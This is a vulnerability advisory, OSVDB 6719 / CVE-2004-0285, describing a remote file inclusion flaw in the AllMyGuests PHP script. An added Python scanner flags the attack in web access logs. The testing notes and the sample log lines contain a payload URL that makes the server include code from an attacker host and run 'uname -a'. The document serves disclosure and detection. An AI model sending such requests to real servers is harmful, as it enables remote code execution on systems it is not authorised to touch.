AllMyGuests info.inc.php Arbitrary Code Execution

2004-02-14T00:00:00
ID OSVDB:6719
Type osvdb
Reporter Pablo Santana (m4dsk4t3r@hotmail.com)
Modified 2004-02-14T00:00:00

Description

Vulnerability Description

AllMyGuests contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when the "_AMVconfig[cfg_serverpath]" parameter is modified to reference a URL on a remote web server that hosts a file named "template.inc.php". The flaw may allow arbitrary code execution, resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a
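
One way to spot requests of the shape shown above in a web server access log, as an added example that is not part of the original advisory: it flags any request whose cfg_serverpath parameter carries a URL instead of a local path. The log format (common/combined), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a common/combined log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any "_...config[cfg_serverpath]" parameter (the advisory shows two prefixes)
PARAM_RE = re.compile(r'^_\w+config\[cfg_serverpath\]$', re.IGNORECASE)
# Value that names another host: "scheme://..." or protocol-relative "//..."
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def find_remote_serverpath(line):
    """Return (path, param, value) if cfg_serverpath is set to a URL, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # parse_qsl percent-decodes, so %5B/%5D and %3A%2F%2F variants are caught too
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if PARAM_RE.match(name) and REMOTE_RE.match(value):
            return (target.path, name, value)
    return None


def scan(lines):
    """Return every hit found in an iterable of access-log lines."""
    return [hit for hit in map(find_remote_serverpath, lines) if hit]


# Constructed sample lines (documentation addresses and hosts, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2004:10:00:01 +0000] "GET /allmyguests/index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [14/Feb/2004:10:02:13 +0000] "GET /allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://remote.example/&cmd=uname%20-a HTTP/1.0" 200 312',
    '198.51.100.7 - - [14/Feb/2004:10:02:40 +0000] "GET /allmyguests/include/info.inc.php?_AMVconfig%5Bcfg_serverpath%5D=http%3A%2F%2Fremote.example%2F HTTP/1.0" 200 298',
    '192.0.2.33 - - [14/Feb/2004:10:05:02 +0000] "GET /allmyguests/include/info.inc.php?_AMGconfig[cfg_serverpath]=/var/www/allmyguests/ HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for path, name, value in scan(SAMPLE_LOG):
        print(f"remote include attempt: {path} {name}={value}")
```

A hit only shows that the request was made; whether the include succeeded depends on the server's PHP configuration and has to be confirmed from the host itself.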

References:

Vendor URL: http://www.php-resource.net/content-10.html
Secunia Advisory ID: 10901
Related OSVDB ID: 6720
Related OSVDB ID: 6721
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-02/0452.html
Keyword: Remote File Inclusion
ISS X-Force ID: 15227
Generic Exploit URL: http://packetstormsecurity.nl/0402-exploits/AllMyGuests.txt
CVE-2004-0285
Bugtraq ID: 9664